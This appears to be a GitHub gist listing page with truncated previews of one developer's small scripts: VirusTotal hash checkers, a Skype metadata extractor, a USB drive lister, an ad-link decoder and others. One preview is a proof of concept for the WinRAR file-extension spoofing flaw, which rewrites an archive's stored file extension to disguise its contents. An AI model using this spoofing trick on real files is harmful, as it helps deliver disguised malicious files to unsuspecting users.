This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| @Author: Sanko | |
| """ | |
| import urllib, json, hashlib, sys | |
| class Api: | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading; | |
| using System.Threading.Tasks; | |
| namespace OffsetLocator |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * SpacecraftRadar its a radar to detect spacecrafts from the enemy | |
| * | |
| * @author (Esteban Montes) | |
| * @version (a version number or a date) | |
| * @exercise statement: http://i.imgur.com/fkM15vm.png | |
| */ | |
| public class SpacecraftRadar | |
| { | |
| public static final int SPACEMAP_DIM = 10; //10x10 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 *-* | |
| #It's a simple script to search the hash of the active processes in VirusTotal | |
| #and check if your active processes are uploaded in VT or not | |
| #Sanko | |
| import urllib, urllib2, hashlib, sys, wmi | |
| import simplejson as json | |
| class VT_Process_Checker(): | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 *-* | |
| #It's a simple script to search the hash of the file in VirusTotal | |
| #and check if your file has been uploaded to VT | |
| #Sanko | |
| import urllib, urllib2, hashlib, sys | |
| import simplejson as json | |
| class VT_File_Checker(): | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 *-* | |
| import sqlite3 | |
| class Skype_Meta_Extractor(): | |
| def __init__(self, DBPath): | |
| self.DBPath = DBPath | |
| def __manager(): | |
| try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes | |
| def cUnidades(): | |
| if ctypes.windll.kernel32.GetLogicalDrives(): | |
| print ", ".join([chr(x) + u":\\" for x in range(65, 95) if (ctypes.windll.kernel32.GetDriveTypeW(chr(x) + u":\\")==2) ]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| PoC of http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29 | |
| """ | |
| def spread(sFile, orgExt, newExt): | |
| f = open(sFile, 'r') | |
| content = f.read() | |
| f.close() | |
| f = open('exploited_%s' % sFile, 'w') | |
| f.write(content[0:len(content)-1000] + content[(len(content)-1000)::].replace(orgExt, newExt)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib, json | |
| class Coderwall: | |
| def __init__(self, username, data=""): | |
| self.username = username | |
| self.url = "http://coderwall.com/" | |
| self.parseData(data) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pycurl, urllib, cStringIO, pool | |
| from base64 import b64decode | |
| class FuckingScan: | |
| def adfly(self, ysmm): | |
| self.ysmm = ysmm | |
| x = '' | |
| y = '' | |
| for c in [ysmm[i:i+2] for i in range(0, len(ysmm), 2)]: |